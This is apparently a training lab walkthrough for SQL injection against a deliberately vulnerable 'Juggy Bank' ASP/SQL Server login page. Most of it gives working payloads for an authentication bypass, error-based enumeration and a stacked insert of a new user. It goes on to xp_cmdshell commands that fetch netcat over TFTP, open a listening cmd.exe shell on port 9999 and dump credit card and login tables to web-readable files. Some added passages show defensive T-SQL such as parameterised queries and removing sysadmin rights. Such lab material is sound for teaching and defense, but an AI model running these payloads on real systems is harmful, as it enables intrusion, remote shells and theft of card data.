Juggy Bank SQL Injection Lab
First of all, let's work out what database the system is running.
On your 2003 Server, open your web browser and go to http://localhost/client2.htm
You should see the Juggy Bank web page.
In the Login Name box type a single quote ' and press return.
This should return an error page that reveals the database type and the ASP script
that produced the error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
before the character string '' and password = ''.
/login.asp, line 5
As can be seen, the back end database is MS SQL Server, and the application does not
handle errors by redirecting to a generic "oops" page: the raw ODBC error, including the
script name and line number, is sent straight to the browser.
Now let's inject into the Login Name box to bypass the authentication check (this is not
blind injection, since both errors and results are visible).
In the Login box type
luke' or 1=1 --
This makes the SQL statement passed to the database the following:
select * from userinfo where username='luke' or 1=1 -- and password=''
Anything after the -- is ignored as a comment, so the password check is never evaluated,
and 1=1 is true for every row.
This should log you into the web page as the first user in the database, since the
query matches every row and the script uses the first one returned.
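The bypass above, as an added example that is not code from the original lab or from Juggy Bank: the concatenated query that login.asp is described as building, beside a parameterised version, written in T-SQL against a constructed copy of the table. The rows, the variable names and the use of sp_executesql are assumptions; the lab's own login.asp is not shown on this page.

```sql
-- Added example, not code from the original lab or from Juggy Bank.
-- Builds a throwaway copy of the userinfo table (constructed rows) and runs
-- the login check two ways: concatenated like login.asp, then parameterised.
CREATE TABLE #userinfo (username varchar(50), password varchar(50));
INSERT INTO #userinfo VALUES ('alice', 's3cret');
INSERT INTO #userinfo VALUES ('bob', 'hunter2');

DECLARE @user nvarchar(200), @pass nvarchar(200), @sql nvarchar(4000);
SET @user = N'luke'' or 1=1 --';   -- the lab's payload; '' is one quote inside a T-SQL literal
SET @pass = N'';

-- 1. Vulnerable: the statement is built by string concatenation, so the
--    quote in @user ends the literal and the -- comments out the password
--    test. Note the whole statement sits on one line; a line break after
--    the -- would leave the password clause in play.
SET @sql = N'select * from #userinfo where username=''' + @user
         + N''' and password=''' + @pass + N'''';
PRINT @sql;     -- shows the statement the database actually sees
EXEC (@sql);    -- returns every row, so a script taking the first row logs in as alice

-- 2. Hardened: sp_executesql binds @u and @p as values. The quote and the
--    -- stay inside the compared string, and no row has that username.
EXEC sp_executesql
    N'select * from #userinfo where username=@u and password=@p',
    N'@u nvarchar(200), @p nvarchar(200)',
    @u = @user, @p = @pass;

DROP TABLE #userinfo;
```

The parameterised form is the fix for every injection on this page, not just the bypass: the database never parses attacker text as SQL, so the later enumeration, stacked INSERT and xp_cmdshell payloads all fail at the same point.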
Now let's go back to the login screen and try enumerating the table. The first
thing we need is the table name. Type the following in the Login box:
' having 1=1 --
This will cause the following error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'userinfo.username' is invalid in the select list because it is not contained
in an aggregate function and there is no GROUP BY clause.
/login.asp, line 5
The error message gives away the table name, userinfo, and the first column name,
username, in the form table.column.
Now we need to know the next column in the table. Type the following in the
Login box:
' group by userinfo.username having 1=1 --
This causes the following error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'userinfo.password' is invalid in the select list because it is not contained in
either an aggregate function or the GROUP BY clause.
/login.asp, line 5
Now let's try once more, grouping by userinfo.password:
' group by userinfo.password having 1=1 --
The error names username again rather than a new column, indicating that userinfo has
only these two columns (grouping by both columns at once would produce no error at all).
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'userinfo.username' is invalid in the select list because it is not contained
in either an aggregate function or the GROUP BY clause.
/login.asp, line 5
We must now work out the column types.
' union select sum(username) from userinfo --
This gives the following error, which shows the type is varchar (SUM only accepts numeric arguments):
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.
/login.asp, line 5
The same probe on the password column
' union select sum(password) from userinfo --
shows that it is also a varchar.
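The column enumeration just walked through, carried through as an added T-SQL example rather than the lab's own material, including the confirmation step the lab does not perform (grouping by every column found so far) that tells you the column list is complete. The table copy and its single row are constructed; each statement is the one the page describes login.asp building for the payload named above it.

```sql
-- Added example, not code from the original lab. Runs the lab's error-based
-- enumeration directly against a constructed copy of the table so the
-- database's responses can be seen without the web page. Each statement is
-- the one login.asp would build for the payload named above it; run them
-- one at a time and read the error (or the empty result) each produces.
CREATE TABLE userinfo (username varchar(50), password varchar(50));
INSERT INTO userinfo VALUES ('alice', 's3cret');

-- Payload: ' having 1=1 --
-- HAVING with no GROUP BY: the error names the first column in the select
-- list as table.column, leaking both the table and the column name.
select * from userinfo where username='' having 1=1 -- ' and password=''

-- Payload: ' group by userinfo.username having 1=1 --
-- Grouping by the column already known moves the error on to the next one.
select * from userinfo where username='' group by userinfo.username having 1=1 -- ' and password=''

-- Check the lab leaves out: group by every column found so far. No error
-- (here an empty result, since no username is '') means the list is
-- complete; an error naming a further column means add it and repeat.
select * from userinfo where username='' group by userinfo.username, userinfo.password having 1=1 -- ' and password=''

-- Payload: ' union select sum(username) from userinfo --
-- Type probe: SUM over a character column is rejected with a data-type
-- error that states the column's type. On SQL Server 2005 and later the
-- wording differs from the lab's ("Operand data type varchar is invalid for
-- sum operator") but the type is still disclosed. Probe each column in turn.
select * from userinfo where username='' union select sum(username) from userinfo -- ' and password=''
select * from userinfo where username='' union select sum(password) from userinfo -- ' and password=''

DROP TABLE userinfo;
```

The enumeration only sees columns that appear in the application's select list; because login.asp uses select *, every column of userinfo is exposed, which is one more reason to select only the columns a query needs.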
Now let's create a new user by stacking a second statement after the original query:
' ; insert into userinfo values('john','password')--
Log in with the newly created user.
Further Investigation
Now let's get some information on other databases.
First, let's put a file on the web server using xp_cmdshell. This works because the
database login used by the web page is a sysadmin; on SQL Server 2005 and later
xp_cmdshell is also disabled by default and would first have to be enabled.
'; exec master..xp_cmdshell "echo I was here on %date% > c:\inetpub\wwwroot\Boo.txt" --
To check that the file is on the server open
To fetch a file from a TFTP server, e.g. netcat (nc.exe) from the server at 172.16.0.11:
'; exec master..xp_cmdshell 'tftp -i 172.16.0.11 get nc.exe c:\inetpub\wwwroot\nc.exe' --
and then run it listening on port 9999 (-L keeps listening after a disconnect, -d
detaches it from the console, and -e hands the connection to cmd.exe):
';exec master..xp_cmdshell 'c:\inetpub\wwwroot\nc.exe -L -d -e cmd.exe -p 9999' --
You should now be able to telnet to localhost on port 9999 and get a command shell.
Now let's dump the credit card details into a txt file:
';exec master..xp_cmdshell 'osql -E -Q "select * from juggybank..creditcard" -o c:\inetpub\wwwroot\card_details.txt' --
To fetch those details off the web server browse to the page
To dump the login details:
';exec master..xp_cmdshell 'osql -E -Q "select * from juggybank..userinfo" -o c:\inetpub\wwwroot\logins.txt' --
To fetch those details off the web server browse to the page
Similar commands can be run to mine data from the system tables: sysdatabases lists
every database on the server, and sysobjects with xtype='u' lists the user tables in one.
';exec master..xp_cmdshell 'osql -E -Q "select * from master..sysdatabases" -o c:\inetpub\wwwroot\masterdatabase.txt' --
';exec master..xp_cmdshell 'osql -E -Q "select * from juggybank..sysobjects where xtype=''u'' " -o c:\inetpub\wwwroot\juggybanktables.txt' --
In the above statement xtype=''u'' uses two single quotes on each side, not a double
quote: the whole osql command line is already inside a single-quoted T-SQL string, so
quotes within it must be doubled.
To fetch those details off the web server browse to the page
and
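The xp_cmdshell steps above only work because the database login used by the web page holds sysadmin and xp_cmdshell is callable. As an added example, not part of the original lab: T-SQL to check both conditions and close them. The login name webapp and the matching user in the juggybank database are assumptions; the sp_configure steps apply to SQL Server 2005 and later (on SQL Server 2000, which this lab appears to use, xp_cmdshell has no on/off switch and the control is sysadmin membership).

```sql
-- Added example, not part of the original lab: the conditions that the
-- xp_cmdshell steps rely on, and how to check and close them.
-- Run as an administrator against the lab instance. 'webapp' is an assumed
-- name for the login that login.asp connects with.

-- 1. Does the login the web page uses hold sysadmin? xp_cmdshell (and
--    sp_makewebtask) run only for sysadmin unless a proxy account is set up.
SELECT IS_SRVROLEMEMBER('sysadmin', 'webapp') AS webapp_is_sysadmin;   -- 1 = member, 0 = not, NULL = no such login

-- 2. Is xp_cmdshell switched on? (SQL Server 2005 and later only; the option
--    is hidden until advanced options are shown.)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';     -- run_value 1 = enabled

-- 3. Close it: disable the procedure and take the web login out of sysadmin,
--    leaving it only what the login page needs on its own table.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_dropsrvrolemember 'webapp', 'sysadmin';
USE juggybank;
GRANT SELECT ON dbo.userinfo TO webapp;   -- assumes a database user named webapp mapped to the login
```

Dropping sysadmin limits what an injection can reach (no xp_cmdshell, no other databases, no creditcard table); the injection itself is only fixed by parameterising the query in login.asp.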
Another way with stored procedures
The above can also be achieved with the sp_makewebtask stored procedure, which writes
the results of a query out as an HTML page:
'; exec sp_makewebtask "c:\inetpub\wwwroot\evil.html", "select * from userinfo"; --
Now request this page with